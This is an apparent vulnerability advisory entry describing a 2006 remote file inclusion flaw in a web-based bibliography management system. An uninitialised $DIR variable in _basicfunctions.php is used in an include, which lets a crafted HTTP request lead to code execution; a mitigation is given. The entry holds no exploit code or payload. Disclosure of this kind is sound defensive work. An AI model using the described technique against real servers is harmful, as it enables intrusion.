vendor: Web based bibliography management system
by: navairum
CVSS: 9.3 (HIGH)
Inclusion of Unspecified Variable
CWE: 20
Product Name: Web based bibliography management system
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Web based bibliography management system
The script _basicfunctions.php uses the $DIR variable in an include without first assigning it a value. An attacker can exploit this by sending a crafted HTTP request that supplies a malicious value for $DIR, which can lead to remote code execution.
Mitigation:
Assign a value to the $DIR variable in the script before it is used in the include.